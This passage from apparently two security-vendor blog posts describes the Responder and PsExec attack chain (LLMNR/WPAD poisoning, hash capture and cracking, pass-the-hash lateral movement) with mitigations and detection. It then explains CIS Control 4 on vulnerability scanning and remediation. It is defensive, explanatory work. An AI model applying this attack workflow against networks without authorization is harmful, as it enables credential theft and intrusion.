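    # LLMNR queries use DNS wire format: a 12-byte header, then a length-prefixed name.
    name, offset = [], 12
    while offset < len(data) and data[offset]:
        length = data[offset]
        name.append(data[offset + 1:offset + 1 + length].decode(errors="replace"))
        offset += 1 + length
    print(f"{src_ip} is looking for {'.'.join(name)!r}")
```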

 

If no hashes are captured via the first method, Responder can also be used to man-in-the-middle Internet Explorer Web Proxy Auto-Discovery (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address for clients querying the network for the "wpad.dat" Proxy Auto-Config (PAC) file. If successful, Responder once again grabs the hashes, which can then be cracked or, if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it’s time to get cracking! Responder saves all hashes as John Jumbo compliant outputs and a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.

 

PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful to launch executables, command prompts and processes on systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec’s availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There’s also the previously-mentioned Windows executable and Core Security’s impacket psexec python script. All are potential options depending on the penetration tester’s preferences and tool availability.

 

 

 

Many networks today struggle to reliably detect remote code execution, which is why it's very common for penetration testers to use Responder and PsExec in the early stages of an engagement. Their effectiveness is due to default Windows environment configurations, as well as protocol-specific behavior that trusts all responses by default.

 

Fortunately, such attacks can be prevented and detected. The first attack we mentioned, Responder's broadcast poisoning, can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren't required unless you're running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year's resolution of upgrading your systems!).

 

To prevent the second showcased Responder attack caused by WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable the Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

 
If your company uses Rapid7's InsightIDR, you can detect use of either Responder or PsExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. For that reason, the Insight Endpoint Agent collects, in real time, the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview of InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the video below.

 

Rapid7 InsightIDR 3-Min Overview - YouTube

 

References:

https://github.com/lgandx/Responder

https://technet.microsoft.com/en-us/sysinternals/psexec.aspx

https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demystified

https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

http://www.openwall.com/john/

https://www.microsoft.com/en-us/download/details.aspx?id=36036

https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283

Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.

 

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities.

 

By not proactively scanning for vulnerabilities and addressing discovered flaws, the likelihood of an organization's computer systems becoming compromised is high. Kind of like building and implementing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.

 

What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 critical controls. This control consists of eight (8) different sections: 4.1 and 4.3 give guidelines on performing vulnerability scans, 4.2 and 4.6 cover the importance of monitoring and correlating logs, 4.4 addresses staying on top of new and emerging vulnerabilities and exposures, 4.5 and 4.7 pertain to remediation, and 4.8 covers establishing a process to assign risk ratings to vulnerabilities.

 

How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).

 

A large part of vulnerability assessment and remediation has to do with scanning, as evidenced by the fact that two sections directly pertain to scanning and two others indirectly reference it by discussing monitoring scanning logs and correlating logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that is not always possible due to various circumstances. This may mean monthly scanning for organizations without a well-defined vulnerability management process and weekly scanning for those that are better established. Either way, when performing these scans it is important to have both an internal and an external scan perspective. This means that machines that are internally facing only should have authenticated scans performed on them, and outward-facing devices should have both authenticated and unauthenticated scans performed.

 

Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.

 

Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) match them to scan logs in order to determine whether the exploit was used against a target known to be vulnerable, rather than being part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were used. This way, we can confirm that the credentials are only being used during scans, and only on devices for which their use has been approved.
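As a toy illustration of that correlation step (the scanner IP, scan window, and event fields below are hypothetical; in practice this matching happens in your SIEM or log management tooling):

```python
# Check whether an attack-detection event lines up with a logged, authorized scan.
from datetime import datetime

SCAN_WINDOWS = [  # (scanner_ip, start, end) taken from scan logs (hypothetical)
    ("10.0.5.20", datetime(2017, 4, 3, 1, 0), datetime(2017, 4, 3, 4, 0)),
]

def from_authorized_scan(event_time, source_ip):
    """Return True if the event matches a known scan window and scanner source."""
    return any(
        source_ip == scanner and start <= event_time <= end
        for scanner, start, end in SCAN_WINDOWS
    )

# An IDS event at 02:15 from the scanner correlates with the scan...
print(from_authorized_scan(datetime(2017, 4, 3, 2, 15), "10.0.5.20"))   # True
# ...while the same signature from another host should be investigated.
print(from_authorized_scan(datetime(2017, 4, 3, 2, 15), "192.0.2.45"))  # False
```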

 

So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures. Some of our favorite places are:

 

It isn't enough to just be alerted to new vulnerabilities, however; we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate a vulnerability based on exploitability and potential impact, and then use that as guidance for prioritizing remediation. What it doesn't spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration (a simple scoring sketch follows the list):

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will be used to compromise this system? Things to keep in mind: how easy is it to exploit this vulnerability, does it require user interaction, etc.
  3. Impact of Compromise – What is the impact to the confidentiality, integrity, and availability of the system and the data it hosts should a particular vulnerability get exploited?
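Control 4.8 only requires that some documented, repeatable process exists. As one hedged illustration, the three factors above could each be rated on a simple 1-to-5 scale and multiplied to produce a prioritization score; the scales, weighting, and example findings below are assumptions for this sketch, not a prescribed formula.

```python
# Minimal sketch of turning the three factors above into a remediation priority.
def risk_score(threat_level, risk_of_compromise, impact_of_compromise):
    """Each factor rated 1 (low) to 5 (high); higher scores get remediated first."""
    return threat_level * risk_of_compromise * impact_of_compromise

findings = [
    # (description, threat level, risk of compromise, impact of compromise)
    ("Internet-facing web server, RCE, public exploit", 5, 5, 5),
    ("Internal print server, local DoS only",            2, 2, 1),
]

for desc, t, r, i in sorted(findings, key=lambda f: -risk_score(*f[1:])):
    print(f"{risk_score(t, r, i):3d}  {desc}")
```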

 

After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which we will do remediation.

 

In order to ensure patches are being applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will see that these tools are necessary if you want a standardized and centrally managed patching process. In more mature organizations, part of the remediation process will include pushing patches, updates, and other fixes to a single host initially. When the patching efforts are complete on this one device, the security team then performs a scan of that device to ensure the vulnerability was remediated before pushing the fix across the entire organization via the aforementioned tools. Tools are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that vulnerability scans that occur after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing up on the report.

 

Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.

 

Related Resources

 
